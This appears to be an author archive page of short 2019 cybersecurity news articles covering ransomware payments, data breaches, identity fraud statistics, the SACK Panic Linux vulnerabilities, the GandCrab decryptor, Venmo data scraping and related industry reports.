Author Archives:

DCMS Pushes Porn Age Verification Deadline Back “Indefinitely”

DCMS Pushes Porn Age Verification Deadline Back “Indefinitely”

The planned age verification scheme, which would have prevented access to pornographic material to anyone who was unable to prove their age, is to be delayed indefinitely.

According to Sky News, Department for Digital, Culture, Media and Sport (DCMS) Secretary Jeremy Wright is expected to announce the delay later today. The verification system was due to come into force on July 15, with website visitors expected to prove their age and identity by uploading scans of passports or driving licenses, or by using age-verification cards sold by newsagents.

Privacy lobbyists the Open Rights Group said “that the scheme provides little assurance to the 20 million adults that are estimated to watch porn in the UK” calling it a “privacy timebomb” as it would lead to a central database of identities which need to be maintained.

The Open Rights Group also said that as the standard was voluntary, there was no obligation for age verification providers to apply it, and no penalties for those verifiers who sign up to the standard and fail to meet its requirements.

Its executive director Jim Killock said: “While it’s very embarrassing to delay age verification for the third time, this is an opportunity for the Government to address the many problems that this ill-thought through policy poses.

“Age verification providers have warned that they are not ready; the BBFC’s standard to protect data has been shown to be ineffective. The Government needs to use this delay to introduce legislation that will ensure the privacy and security of online users is protected.”

Mishcon de Reya's Cyber Intelligence director Mark Tibbs said that while this is seemingly a good idea on the face of it, introducing a “porn block” based on age verification is likely to have a number of unintended consequences which could create more problems than it solves.

“If the Ashley Madison hack taught us anything, it's that a company which holds personal information about millions of users' sex lives will be a prime target for hackers and extortionists, regardless of how good security is,” he said.

“Underage porn seekers and even adults not wanting to give over their personal information are likely to quickly find services to hide their true identities and bypass the controls. It will possibly even drive determined porn seekers onto alternative platforms such as the dark web, which are harder for governments to regulate, and may be more likely to expose users to illegal content. It may even stimulate an illicit black market of stolen accounts and identities, giving budding hackers even more reason to steal online identities."

Infosecurity was joined by Jim Killock and psychotherapist Ronete Cohen for a discussion around the ethics of the age verification scheme during our last Online Summit. Listen again here.

Florida City Pays $600K to Ransomware Authors

Florida City Pays $600K to Ransomware Authors

A Florida city has agreed to pay cyber-criminals $600,000 to regain access to computer systems encrypted with ransomware, highlighting the continued threat to organizations from extortion-based attacks.

The Riviera Beach City Council voted unanimously to pay off the hackers, after security consultants hired to help recommended the extreme course of action, which runs at odds to advice from law enforcement.

The council had already voted to spend $900,000 on new computers after the attack struck three weeks ago, bringing the total outlay for the city of 32,000 residents to $1.5m.

The attack appears to have begun with a classic phishing email which a city employee clicked on. According to AP, the unnamed ransomware variant crippled email systems, forced city employees and suppliers to be paid by cheque, and even interfered with 911 dispatches.

The incident is just the latest in a long line of successful ransomware attacks targeting US cities. Most recently, Baltimore suffered major outages which are said to be costing the city $18m. Another ransomware blitz forced employees in Del Rio back to pen and paper.

However, both of those cities refused to pay the ransom. Paying up is generally discouraged by law enforcers as there’s no guarantee that victims will regain access to their data and it means they may be singled out as easy targets in future raids.

According to the FBI, there were just 1493 reported victims of ransomware last year with attacks costing them a little over $3.6m. However, these figures are likely to be a significant under-estimate, given many attacks won’t be reported and the figure for losses doesn’t include “lost business, time, wages, files, equipment, or any third party remediation services acquired by a victim.”

Cyber-criminals appear to be focusing their efforts increasingly on businesses. The number of ransomware detections targeting consumers dropped 10% quarter-on-quarter in Q1, whereas attacks against corporates surged 195%, according to Malwarebytes.

UK Identity Fraud Jumps 8% to New All-Time High

UK Identity Fraud Jumps 8% to New All-Time High

Identity fraud rose by 8% in the UK last year to hit an all-time high, with both the very young and old experiencing the biggest increases, according to Cifas.

The anti-fraud non-profit’s latest Fraudscape report for 2018 was compiled as always from the 350 organizations that submit data to its National Fraud Database.

These members recorded nearly 324,000 cases of fraud overall last year, a return to the highs of 2015 and 2016 after a dip in 2017.

The number of over-60s suffering identity fraud shot up 34% over the previous year, while the number of under-21s experiencing impersonation attacks jumped by 26%.

Online use was blamed for a large part of the rise, especially for the elderly, more of whom are using the internet at home, the report claimed. Younger victims’ large social media presence also exposes them to the risk of scams, it said.

There was a 41% in scams targeting plastic cards: again, older members of society are increasingly being targeted here as they’re perceived to be more likely to be approved for credit, Cifas said.

The report also detailed another sharp rise in the fraudulent use of bank accounts. The volume of cases jumped 26%, indicating a rise in money mule activity.

Often, the proceeds being laundered through these accounts come from authorized push payment (APP) scams, an increasingly popular fraud tactic in which the victim is tricked into sending money to the scammer or a third party under their control.

Incidents of APP shot up 90% between 2017 and 2018, costing victims an estimated £354m, according to UK Finance.

The largest number of money mules are in the age group 21-30, followed by under-21s, although all age ranges showed an increase in activity, Cifas found.

CISOs Struggling With 50+ Separate Security Tools

CISOs Struggling With 50+ Separate Security Tools

Organizations are struggling to gain real-time visibility into their security technologies and suffering from an excessive number of tools running across the enterprise, according to new research from Panaseer.

The security monitoring firm polled 200 enterprise CISOs to better understand their key strategic challenges, as part of its first Security Leader’s Peer Report.

It revealed that 87% are struggling to gain any meaningful insight into trusted data, while a sizeable minority (31%) are concerned this may impact their ability to comply with key regulations.

Complex, siloed IT systems are compounding these challenges, the report found.

On average, responding organizations are running 57 separate security tools. Over a quarter (27%) claimed to be running a staggering 76+ discrete security products.

These aren’t necessarily making the organization any safer – in fact, they may be working to do the opposite. Over 70% of respondents admitted that they don’t even evaluate their security tools based on how effectively they reduce cyber risk.

The result is that enterprises are often flying blind when it comes to security, with security teams forced to spend much of their valuable time producing reports manually. This was cited by over a third (36%) of respondents.

The administrative burden of formatting and presenting data, working with spreadsheets and compiling data for regulators and the board is an overhead that stretched security teams can ill afford, according to Panaser CTO Charaka Goonatilake.

Instead of deploying scarce cyber-experts to improve security in the business, they’re wasting their talents on manually constructing reports in an attempt to provide visibility into security posture,” he told Infosecurity.

He argued that automation is an opportunity to accelerate decision making, reduce error and enhance visibility.

Automating the end-to-end process of creating a complete, accurate and up-to-date view of an organization's security posture on a daily basis requires collection, cleansing and analysis of data from dozens of sources followed by formatting and presenting the generated insights,” Goonatilake added. 

“Manual reports are so prone to error, as they can only give a single snapshot in time and are then out of date almost immediately.”

Millions Fall Victim to System Cleaner Hoaxes

Millions Fall Victim to System Cleaner Hoaxes

The first half of 2019 has seen a spike in the number of PC users attacked with fake system cleaners, according to research from Kaspersky.

Research shows that the number of users jumped to 1,456,219 in the first half of 2019, compared to just 747,322 for the same period in 2018.

“We’ve been watching how the phenomenon of hoax cleaners has been growing for the last couple of years, and it is a curious threat. On the one hand, many samples that we have seen are spreading more widely and becoming more dangerous, evolving from a simple ‘fraudulent’ scheme into fully functioning and dangerous malware," said Artemy Ovchinnikov, security researcher at Kaspersky, in a press release.

"On the other hand, they are so widespread and seemingly innocent, that it is much easier for them to trick users into paying for a service rather than frightening them with screen blockers and other unpleasant malware. However, these two ways end up [with] the same results with users losing their money.” 

With many users complaining of slow computers and crash errors, malicious actors have taken to offering specious solutions, though the programs that are supposed to scrub the computer clean are really just hoaxes.

These types of hoaxes are difficult for the average user to detect given that there are many legitimate tools that do actually solve such issues. However, researchers are seeing more of these fraudulent programs designed to trick users into paying for alleged computer issues to be fixed.

Cyber-criminals are leveraging user vulnerability and tricking them into installing the hoax cleaners, which are really just disguises for malware such as Trojans or ransomware, according to Ovchinnikov.

Though these hoaxes can be distributed through scams or dubious websites, “Hoax developers’ target audience is inexperienced home users not very familiar with device operating systems or concerned about 'taking out the trash' and updating the system," Ovchinnikov wrote.

“Our statistics show that the most popular target country for Hoax creators and distributors is Japan, where in recent years one in eight users has encountered it. Japan is followed by Germany and, surprisingly, Belarus. Italy and Brazil round out the top five.”

Security Should Be Business Focused, Says ISF

Security Should Be Business Focused, Says ISF

A security assurance program that focuses on business needs can help organizations meet the needs of business stakeholders, according to a new report released by Information Security Forum (ISF).

The report, Establishing a Business-Focused Security Assurance Program, offers organizations ways to establish a security assurance program that takes a business-focused approach by “identifying how to move from current to future approaches, introducing three fundamental elements that underpin successful business-focused security assurance and describing a repeatable process to provide security assurance.”

Given that implementation of security assurance programs vary significantly among businesses, the report is an effort to formalize the structure through four strategic objectives:

  • Identifying the specific needs of different business stakeholders

  • Testing and verifying the effectiveness of controls, rather than focusing purely on whether the right ones are in place

  • Reporting on security in a business context

  • Leveraging skills, expertise and technology from within and outside the organization

“Taking a business-focused approach to security assurance is an evolution. It means going a step further and demonstrating how well business processes, projects and supporting assets are really protected by focusing on how effective controls are,” said Steve Durbin, managing director, ISF, in today’s press release.

“A business-focused approach requires a broader view, considering the needs of multiple stakeholders within the organization: what do they need to know, when and why? Answering these questions will enable adoption of testing, measurement and reporting techniques that provide appropriate evidence.”

“In today’s fast-moving business environment, filled with constantly evolving cyber-threats, business leaders want confidence that their processes, projects and supporting assets are well protected. An independent and objective security assurance function should provide business stakeholders with the right level of confidence in controls – complacency can have disastrous consequences,” continued Durbin.

“Establishing a business-focused security assurance program is a long-term and ongoing investment. The ISF approach presented in this report will help organizations to review current approaches and determine how to turn aspirations into reality.”

SACK Panic Vulnerability in Linux

SACK Panic Vulnerability in Linux

Researchers at Netflix have discovered new denial-of-service (DoS) vulnerabilities in Linux and FreeBSD kernels, including a severe vulnerability called SACK Panic that could allow malicious actors to remotely crash servers and disrupt communications, according to an advisory published at its Github repository.

“The vulnerabilities specifically relate to the Maximum Segment Size (MSS) and TCP Selective Acknowledgement (SACK) capabilities. The most serious, dubbed “SACK Panic,” allows a remotely-triggered kernel panic on recent Linux kernels,” the advisory stated.

Netflix researchers added that there are patches for most of these vulnerabilities and additional mitigation strategies to consider if patching is not possible.

“The issues have been assigned multiple CVEs: CVE-2019-11477 is considered an Important severity, whereas CVE-2019-11478 and CVE-2019-11479 are considered a Moderate severity,” a Red Hat advisory stated.

These flaws can reportedly impact any organization running large fleets of production Linux computers and, if left unpatched, allow remote attackers to take control and crash the machines.

“The Linux TCP SACK vulnerability is a truly serious threat. First, this is a threat to man Internet-facing servers of the big giants of the internet (Google, Amazon, etc.) – and right now the focus is on upgrading the endless servers that are used as the infrastructure for the internet and the countless applications that rely on them,” said Armis’ VP of research, Ben Seri.

“Once the dust settles and the majority of this infrastructure has received the proper patch, many organizations will then need to deal with the long tail of the patching cycle. At the very end of this tail are the devices that don't receive automatic updates and might not receive any update at all – the [internet of things] and unmanaged devices that in many cases are built on top of Linux. This vulnerability also goes back a long time (since Linux v2.6.29, that was released 10 years ago), so the amount of legacy devices that use the vulnerable code will be very significant in this case, and these types of devices are unlikely to receive patches at all.”

Hackers Gobble Up Data From EatStreet Diners and Partners

Hackers Gobble Up Data From EatStreet Diners and Partners

Online food ordering service EatStreet has revealed a major data breach affecting customers and restaurant partners.

Although the number of companies and individuals affected isn’t known, the firm claims to partner with over 15,000 restaurants in hundreds of US cities, so the figure could theoretically surge into the millions.

The two-week incident happened in May, when an “unauthorized third party was able to acquire information in our database,” according to letters sent to EatStreet’s customers, delivery partners and restaurants.

For the latter two, the information stolen may have included names, phone numbers and email addresses, plus bank account information.

However, for customers of the service, things look even worse, with the hacker potentially making off with credit card number, expiry date, CV2 number, billing and email address, name and phone number. That’s more than enough information to commit a serious range of identity fraud and to launch follow-on phishing attacks.

EatStreet claimed to have responded quickly to the incident, and said it has “reinforced” multi-factor authentication, rotated credential keys and reviewed and updated its coding practices to improve security going forward.

Interestingly, the firm’s website was also down at the time of writing.

“The case of the Eatstreet breach is a doomsday scenario for the average consumer where a service was used for convenience or necessity, and ended up causing a major threat to the consumer's interests,” argued Colin Little, senior threat analyst at Centripetal Networks.

“With the number of mobile or cloud-based consumer services a person leverages day-to-day, and the two-week time-to-detect for complete access to a database that contains some of the most sensitive PII, this event shows that consumers deserve organizations who will proactively hunt for threats to minimize the risk to consumer data.” 

AMCA Files for Bankruptcy Protection After Breach

AMCA Files for Bankruptcy Protection After Breach

The parent company of healthcare debt collection firm American Medical Collection Agency (AMCA) has filed for bankruptcy protection following a major breach which is thought to have affected as many as 20 million patients.

Its Chapter 11 filing in the Southern District of New York reveals the action was taken due to a “cascade of events” and “enormous expenses that were beyond the ability of the debtor to bear.”

These were precipitated by that eight-month breach, discovered in March this year, which affected millions of patients of clients including Quest Diagnostics, LabCorp and BioReference. These were customers of the medical testing firms who owed them money.

Data stolen by the hackers included payment card details, bank account information, personally identifiable information (PII) and lab test details, according to reports.

Russell Fuchs, CEO of parent company Retrieval-Masters Creditors Bureau, lent AMCA $2.5m to help pay for a mass mailing effort of breach notifications for users which is said to have cost $3.8m. Some $400,000 was apparently spent on IT services to help with the remediation and investigation of the incident.

The news of a debt collection business being short of cash will fill few neutral observers with sadness.

However, the breach itself threatens to plunge those debtors whose details were stolen into a nightmare of phishing attempts, identity theft and possible damage to their credit ratings.

That’s probably why lawmakers have stepped in. Democrat Senators Bob Menendez, Cory Booker, and Mark Warner wrote to Quest Diagnostics asking about the incident, which affected nearly 12 million of its patients.

“While I am heartened to learn that no evidence currently suggests Quest Diagnostic’s systems were breached, I am concerned about your supply chain management, and your third-party selection and monitoring process,” said Warner in his letter.

Only Quarter of IaaS Users Can Audit Config Settings

Only Quarter of IaaS Users Can Audit Config Settings

Most global organizations benefit from better security in the cloud than on-premise, with some key exceptions, including data loss prevention and configuration settings, according to McAfee.

The security giant polled 1000 enterprises around the world and combined its findings with threat data gleaned from its products to compile the Cloud Adoption and Risk Report.

The vast majority (87%) said they “experience business acceleration” through their use of cloud services.

However, while 52% benefit from improved security versus on-premise, and just 10% of data is hidden in shadow IT environments, there were caveats.

Only 36% of respondents said they could enforce DLP in the cloud, and just a third said they could control collaboration settings to determine how data is shared. Perhaps even more worryingly, only a quarter (26%) of IaaS users said they could audit configuration settings.

Misconfigured cloud infrastructure is an increasing problem: according to the report, over 1/20 of Amazon S3 buckets in use are misconfigured to be publicly readable. In fact, it found that enterprises are under-estimating the number of services they use by more than 6000%.

John Noakes, cloud specialist at IT solutions firm Insight UK, argued that this cloud sprawl should be cause for “major alarm.

“To have any hope of controlling risk, organizations need to understand the risks they face, and take firm control of their cloud environments. This means having rigorous controls in place to govern how cloud services are purchased and managed, so that IT is not left unaware of the potential scale of any problem,” he added.

“It means following best practice with commissioning and configuring cloud infrastructure, so that data is not left wide open to the public. Part of the problem is that legacy tools, skills and processes aren’t fit for the cloud era, yet many organizations haven’t adapted. As a result, they continue to leave themselves wide open to unnecessary risk.”

Facebook Announces Digital Wallet and Coin, Libra

Facebook Announces Digital Wallet and Coin, Libra

Because it possibly stands to faces billions of dollars in fines from the US Federal Trade Commission (FTC), Facebook, today announced its plans for Calibra, a Facebook subsidiary that will provide financial services and enable users to have access to and participate in the Libra network.

“Calibra will let you send Libra to almost anyone with a smartphone, as easily and instantly as you might send a text message and at low to no cost. And, in time, we hope to offer additional services for people and businesses, like paying bills with the push of a button, buying a cup of coffee with the scan of a code or riding your local public transit without needing to carry cash or a metro pass,” the news release stated.

Intended to be officially released in 2020, the digital currency is powered by blockchain technology. However, not all responses to the news have been positive. The cryptocurrency is “a glorified exchange traded fund which uses blockchain buzzwords to neutralize the regulatory impact of coming to market without a licence as well as to veil the disproportionate influence of Facebook in what it hopes will eventually become a global digital reserve system,” according to the Financial Times.

While some remain weary, given Facebook’s recent track record of failing to protect consumer data, the company added that “Calibra will have strong protections in place to keep your money and your information safe. We’ll be using all the same verification and anti-fraud processes that banks and credit cards use, and we’ll have automated systems that will proactively monitor activity to detect and prevent fraudulent behavior.”

The idea that social and financial data could be combined is worrying, said Ray Walsh, digital privacy expert at ProPrivacy.

“Although Facebook claims that it will keep the distinct data sets at arm's length – it is hard to believe that consumer habits will not be tracked in order to allow Facebook to better serve ads. After all, that is how the firm produces the majority of its revenue streams.

“Facebook has proven, time and time again, that it is not to be trusted with consumer data, and it seems unlikely that it does not plan to exploit as much consumer data as it is legally permitted to do so. Facebook's whitepaper claims that it will not source transaction data from the Libra Blockchain without consumer consent. For the time being, no privacy policies or Terms of Service are available for Libra coin.”

Accenture Acquires Deja vu Security

Accenture Acquires Deja vu Security

Deja vu Security has become a part of Accenture’s cyber-defense offerings through an acquisition announced on June 17.

The Seattle-based Deja vu Security was founded in 2011 and has been providing a range of business application security solutions with a focus on integrating security into the product development lifecycle. Accenture continues to invest in next-generation cybersecurity solutions that will deliver end-to-end security for clients’ business. Financial terms of the agreement were not disclosed.

No financial details of the deal have been disclosed. “Deja vu Security brings to Accenture a deep expertise in the techniques, tools and methods for securing connected devices and IoT networks,” the press release said. The transaction heightens Accenture’s ability to improve the “security of things.”

“For technology companies, third-party suppliers and consumers alike, IoT security controls often remain an afterthought which is why it’s critical that security is built in from the start for any new products, processes or services,” said Kelly Bissell, senior managing director of Accenture Security. “Deja vu Security’s team of innovative specialists brings considerable technical cybersecurity skills, making them a strong strategic fit and [helping] our clients reduce the risk of their connected solutions. We are very excited to welcome the Deja vu Security team to Accenture.”

Deja vu Security and its employees are reportedly excited about the transaction, according to the press release. “Accenture’s people-focused culture and innovative mindset are core values that both companies share, and our unique capabilities complement each other perfectly. We are thrilled to be joining such a high-caliber global organization,” said Adam Cecchetti, Deja vu Security’s chief executive officer.

DNS Attacks Grow More Frequent and Costly

DNS Attacks Grow More Frequent and Costly

Domain name server (DNS) attacks have grown in frequency and cost, according to multiple research reports published this week.

The Domain Fraud Threats Report from Proofpoint found that Chengdu West Dimension Digital, NameSilo, Public Domain Registry and GoDaddy are the top fraudulent domains. Of the millions of fraudulent domains registered, 1 in 4 have security certificates and more than 90% remain active on a live server. In addition, more than 15% have mail exchanger records.

“Fraudulent domains 'hide in plain sight' by using many of the same top-level domains (TLDs), registrars, and web servers as legitimate domains. For example, 52% of all new domain registrations in 2018 used the .com TLD. The TLD was similarly popular with fraudsters: nearly 40% of new fraudulent domain registrations used .com,” Proofpoint’s Ali Mesdaq wrote in a June 17 blog post.

In related news, IDC’s 2019 Global DNS Threat Report, commissioned by Efficient IP, found that DNS attacks cost an average of $1.07 million for organizations, a jump of 49% from last year.

While many organizations have faced a 34% increase in DNS attacks since 2018, more than 85% of top retail brands found domains selling counterfeit versions of their products and 63% of organizations suffered application downtime. The report also found that 45% of organizations had their websites compromised, and 27% experienced business downtime.

“One in five businesses lost over $1 million per attack and causing app downtime for 63% of those attacked,” a June 18 press release said. The study also highlighted the changing popularity of attack types, which reflect a shift from volumetric to low signal, including phishing, malware-based attacks and old-school distributed denial of service (DDoS).

“With an average cost of $1m per attack and a constant rise in frequency, organizations just cannot afford to ignore DNS security and need to implement it as an integral part of the strategic functional area of their security posture to protect their data and services,” said Romain Fouchereau, research manager European security at IDC.

#OktaForum: Biometrics Are Authentication Preference, Privacy Concerns Remain

#OktaForum: Biometrics Are Authentication Preference, Privacy Concerns Remain

Biometrics are seen as a positive step forward in authentication, but employees maintain privacy concerns.

According to a survey of 4013 workers across the UK, France and the Netherlands, the Okta Passwordless Future Report found that 78% of respondents use an insecure method to help them remember their password, including: using the same passwords for multiple accounts (34%), writing passwords down (26%),  17% typing passwords on a phone or computer (17%) and using well-known passwords (6%).

Dr Maria Bada, research associate at Cambridge University, said: “Passwords are often quite revealing. They are created on the spot, so users might choose something that is readily to mind or something with emotional significance.

“Passwords tap into things that are just below the surface of consciousness. Criminals take advantage of this and with a little research they can easily guess a password.”

The research also found that 70% of respondents believe biometrics would benefit the workplace, but 86% have some reservations about sharing biometrics with employers. 

Todd McKinnon, CEO and co-founder of Okta, said: “Passwords have failed us as an authentication factor, and enterprises need to move beyond our reliance on this ineffective method.”

Speaking to Infosecurity, McKinnon said that Okta sees the role of biometrics is the “last mile” and the value it provides is for the policy layer, and you need to determine what your policy is.

“There is still a bunch of work that has to happen to map that, and to have access to a certain server or application, so I envisage that there will be different levels that are high or low risk,” he added.

McKinnon pointed to the need for a central policy to link all of the biometric access data together for the appropriate scenario. He said that Okta provides the technology to enable access, but it is up to the customer to determine how they enable access, whether it is via a personal phone or a corporate device, “based on the resources you are trying to access.”

On the issue of trusting employees, McKinnon said that there are too many bad user experience cases where a person cannot get a text on a personal phone, or too much data is collected due to privacy issues “because the policy is not flexible and the company does not have the right resource to check, so they over-collect information.”

Dr Bada said: “Biometric technology can be promising in creating a passwordless future, but it's essential to create an environment of trust, while ensuring privacy and personal data protection.’’

#OktaForum: Trust is Key to Identity and Security

#OktaForum: Trust is Key to Identity and Security

Trust remains the most important factor in enabling security and identity management.

Speaking at the Okta Forum in London, Okta CEO Todd McKinnon said that every company is a technology company now, and if you are not a technology company “your replacement will be a technology company.”

McKinnon explained that technology comes with risks, such as the “war on talent” which is making finding the right people hard, while “unprecedented regulations” like GDPR are bringing frameworks to companies who preceded the technology revolution, while social networking has led people to be concerned about trust and privacy.

“There is a tremendous potential of technology, but it is not without issues and risks and can lead to the erosion of trust,” he said. “At Okta, we believe that the potential of technology is amazing, but a lack of trust won’t enable us to reach its potential, so we need to trust the new frontier as we’re all technology companies.”

McKinnon said that there is a “burden to be secure” and for Okta the solution is that identity is key. “Connect people to technology and get identity right and solve the trust problem,” he advised.

He went on to say that the use of any technology is not about identity or security, “but to push for you to be successful” and to enable that, Okta built the Okta Identity Cloud

McKinnon said that the company was focused on building the best products, having a comprehensive set of integrations, supporting use cases and building up data “to help you do the right actions in your environment.”

Speaking to Infosecurity, McKinnon explained that after the revolution of technology companies, the “backlash against technology” and the impact on privacy had “evened up the ante as companies need to get identity right.”

White Hats Update GandCrab Decryptor to Hasten its End

White Hats Update GandCrab Decryptor to Hasten its End

Infamous ransomware GandCrab could finally be on the way out, after white hats released yet another updated decryptor tool designed to help victims to get their data back.

In partnership with various law enforcement agencies including Europol, the Metropolitan Police, the FBI and NCA, Bitdefender has released the latest in a string of tools which it claimed has saved tens of thousands of organizations $50m in unpaid ransom money.

This effectively neutralizes every version of the ransomware-as-a-service offering up to and including the latest, v5.2. It can be downloaded from the No More Ransom project.

Although the ransomware rose to claim a 50% market share in August 2018, these efforts have done much to limit its appeal on the cybercrime underground.

“The three decryptors released in collaboration with partner law enforcement agencies – and particularly the GandCrab decryptor for version 5.1 – compelled GandCrab affiliates to shrink their business to avoid unnecessary costs,” claimed Bitdefender senior threat analyst, Bogdan Botezatu.

“For instance, in February 2019, after the release of the decryptor for version 5.1, affiliates kept pushing decryptable versions of the malware for more than a week, allowing fresh victims to decrypt their data for free. As of March 2019, GandCrab’s market share has shrunk back to 30%, with almost one in three infections tied to the group.”

GandCrab differs from many of its counterparts in that it’s offered via an affiliate model: distributors effectively purchase a license to spread the malware, keeping most of the profits themselves but sharing 40% with the original developers.

It’s a model that has served those ransomware authors well: a few weeks ago they published a statement claiming to have generated $2bn from their endeavors over the past year, personally netting $150m.

In the same note they claimed to be retiring, and stopped distribution partners from accessing the latest version of the ransomware.

This could spell the end for GandCrab, but it won’t be the end of the ransomware threat for businesses.

Botezatu claimed his firm sees 12 new ransomware strains each month, of which only around 10% are decryptable.

Oregon State Uni Attack Exposes Data on Hundreds

Oregon State Uni Attack Exposes Data on Hundreds

Another US university has been hit by a successful cyber-attack, this time potentially compromising personal information (PII) on hundreds of students and family members.

Oregon State University (OSU) issued a public notice on Friday after one of its employee’s email accounts was hacked last month and used to spam others with phishing emails.

Forensic investigators found several documents in the breached inbox which contained the PII of 636 students and their relatives, a statement from the university noted.

“OSU is continuing to investigate this matter and determine whether the cyber-attacker viewed or copied these documents with personal information,” said Steve Clark, the university’s vice-president for university relations and marketing.

“While we have no indication at this time that the personal information was seen or used, OSU has notified these students and family members of this incident. And we have offered information about support services that are available, including 12 months of credit monitoring services that the university will enable at no cost.”

Andrew Clarke, EMEA director at One Identity, argued the incident shows that people remain the “first and last line of cyber-defense.

“Creating a framework for identifying, authenticating, and authorizing correct access for sensitive information and ensuring that it is implemented across the entire organization can help protect information pertaining to individuals, which is the most critical type of data held by many institutions,” he added.

“PII such as social security numbers, names and physical addresses, and usernames and passwords are a key target, and just one major breach of such data and there is a loss of faith in the organization and knock-on impact on the business."

Universities are an increasingly popular target for both financially-motivated cyber-criminals and even state-sponsored hackers – who are looking for large troves of personal data on students and staff to monetize sensitive IP in ground-breaking research.

Earlier this year, Georgia Tech suffered a breach of 1.3 million staff and student records after a web app vulnerability was exploited by attackers.

Trans Charity Mermaids Apologizes Over Leaked Emails

Trans Charity Mermaids Apologizes Over Leaked Emails

A transgender charity has apologised after journalists were able to find sensitive internal emails via a public internet search.

Mermaids UK, which supports trans children and young people, said the emails came from 2016 and 2017, when it was a smaller organization without the internal processes and access to technical support which would now prevent such incidents.

Although the original Sunday Times report which uncovered the leak said the emails included “intimate details of vulnerable youngsters” which could be found simply by typing the organization’s name and charity number in, Mermaids sought to downplay the seriousness of the incident.

“Mermaids understands that the information could not be found unless the person searching for the information was already aware that the information could be found,” it said in a statement.

“The material mainly consisted of internal information involving full and frank discussion of matters relevant to Mermaids, but unfortunately included some information identifying a small number of service users. Mermaids has contacted these people. The information, seen in its actual and proper context, is normal internal information for a group such as Mermaids.”

The emails in question, which the BBC claims number around 1100, were apparently stored in a ‘private’ user group exposed online.

As well as contacting those whose details appeared in the leaked emails, the charity has contacted privacy regulator the Information Commissioner’s Office (ICO) and the Charity Commission and said it immediately remediated the incident.

“So the overall position is that there was an inadvertent breach, which has been rapidly remedied and promptly reported to the ICO, and there is no evidence that any of this information was retrieved by anybody other than the Sunday Times and those service users contacted by the journalist in pursuit of their story,” it concluded.

The scope of the incident falls well before the GDPR was introduced, although if the ICO judges there to have been a serious risk to vulnerable individuals, it may decide to take action under the old data protection regime.

NYT: US Targets Russian Power Grid

NYT: US Targets Russian Power Grid

After news broke that the US has ramped up its digital attacks on Russia, according to a New York Times article, President Trump tweeted that the story was a "virtual act of treason by a once great paper...ALSO, NOT TRUE.”

Though there are no details of the malware that was reportedly placed inside Russia’s power grid system, the NYT reported that National Security Presidential Memoranda 13, a classified document, grants the Department of Defense (DoD) the power to conduct offensive online operations without receiving presidential approval.

Specifically, General Paul Nakasone, commander of the US Cyber Command, holds that authority to make these decisions about offensive strategies. Without confirming that the DoD is taking more aggressive measures, House minority whip Steve Scalise told Meet the Press on June 16, “I'm glad the administration has been taking aggressive actions."

“An offensive cyber-strategy is a necessary component of a larger military and diplomatic strategy against a determined US adversary like Russia. After all, let’s not forget that Russia has been targeting US utilities for several years, at least,” said Carlos Perez, R&D practice lead at TrustedSec.

“US-CERT warned just last year about Russia’s cyber-operations against multiple US utilities. We’ve also seen Russia put these capabilities to real-world effect, as in the case of the two cyber-induced power outages that affected Ukraine. We have to take this threat seriously, and having a cyber-response ready to go is of paramount importance."

Perez clarified that the operations described by the New York Times also do not constitute cyber-war, nor do they exceed the legal restrictions set by our own government.  

"The Department of Defense Law of War Manual has codified cyber operations, which this current action falls within. As you’ll notice, these guidelines include such operational objectives as reconnaissance, acquiring and securing access to key systems, and implanting access tools into infrastructure for the purpose of acquiring foreign intelligence, gaining information about an adversary’s capabilities and gathering information to determine intent, just to name a few.”

While trying to avoid the risk of escalating the situation with Russia, Perez said that this action and others taken by US cyber-ops teams are aimed at preparing the battle space with Russia, so that the US will be ready at some future point, should direct action need to be taken.

“This is also about deterrence, as we are signaling to Russia that we have the technical means and capabilities and the will to use them if we have to. As for the risk of ending up in a full-scale cyber-war, the reality is that we have been close to it with several events that have happened but remained in an economic, intelligence and influence conflict with Russia, as well as other countries, like China, Iran and, to a lesser extent, North Korea. These are low-intensity conflicts but they could escalate at any point, even without us engaging in our own offensive cyber-ops.”

Seven Million Venmo Transactions Published on GitHub

Seven Million Venmo Transactions Published on GitHub

Venmo users are being advised to set their accounts to private after a computer science student scraped seven million Venmo transactions, proving that users’ public activity can be easily accessed, according to The Next Web (TNW).

Over a six-month period, Minnesota State University computer science student Dan Salmon, collected a data set, which Salmon exported from MongoDB, of more than seven million Venmo transactions, which he published on GitHub.

“I am releasing this dataset in order to bring attention to Venmo users that all of this data is publicly available for anyone to grab without even an API key. There is some very valuable data here for any attacker conducting OSINT research,” Salmon wrote.

“I would highly encourage all users to switch their Venmo account to private by going to Settings > Privacy and selecting "Private" as well as Past Transactions > Change All to Private. Screenshot instructions are available here.”

"Transparency may often be used against the legitimate interests of end users. Probably very few of us wish to share all their payment transactions with the rest of the world even if we have nothing to hide. Venmo should explicitly and conspicuously notify all its users that their transactions are accessible by everyone unless they update their settings,” said Ilia Kolochenko, founder and CEO of web security company ImmuniWeb.

“[The] developer’s API should be provided only to vetoed, properly verified third parties within a scope of a binding legal agreement capable of protecting users’ privacy regardless of technical flaws one may discover now or in the future,” Kolochenko said.

“Anti-scraping functionality probably requires holistic testing via an open bug bounty program, for example, to spot and remediate as many anti-automation bypasses as possible. This will not provide absolute protection but at least will considerably reduce the efficiency of data-scraping campaigns. Without all these common-sense measures, Venmo may face serious legal ramification and severe monetary penalties in many jurisdictions, let alone disgruntled users and loss of revenue."

In an email to Infosecurity, a Venmo spokesperson said, "Venmo was designed for sharing experiences with your friends in today’s social world, and the newsfeed has always been a big part of this. The safety and privacy of Venmo users and their information is always a top priority. 

"Venmo does a number of things to keep our users informed and help them protect and control their privacy, including:

  • "The social newsfeed: When people open the app, the first thing they see is the newsfeed. This is the first step in educating users that Venmo is a social forum and the newsfeed allows you to see what others have chosen to share on Venmo and the experiences that are happening on Venmo.
  • "Users choose what to share: Like on other social apps, Venmo users can choose what they want to share and which audience they share it with. It is very clear in each payment what audience it is being shared with and we have made this even more prominent in recent years."

Eliminate Outdated Identity Proofing, Says GAO

Eliminate Outdated Identity Proofing, Says GAO

The remote identity proofing used by four large government agencies has been deemed outdated by a new report released by the U.S. Government Accountability Office (GAO).

According to the report, the Postal Service, Department of Veteran Affairs, Social Security Administration and the Centers for Medicare and Medicaid Services use outdated tactics to verify citizens’ data over the phone.

Of the six agencies GAO interviewed, only two have eliminated the use of knowledge-based verification methods. The remaining four government agencies rely on “consumer reporting agencies (CRAs) to conduct a procedure known as knowledge-based verification,” the report said. That is, individuals are asked questions based on information available in their credit reports.

As a result, any fraudster could potentially use information available from the 2017 Equifax breach or the latest hack of the week to answer security questions and start collecting social security checks of vulnerable Americans or embezzle veterans’ healthcare benefits.

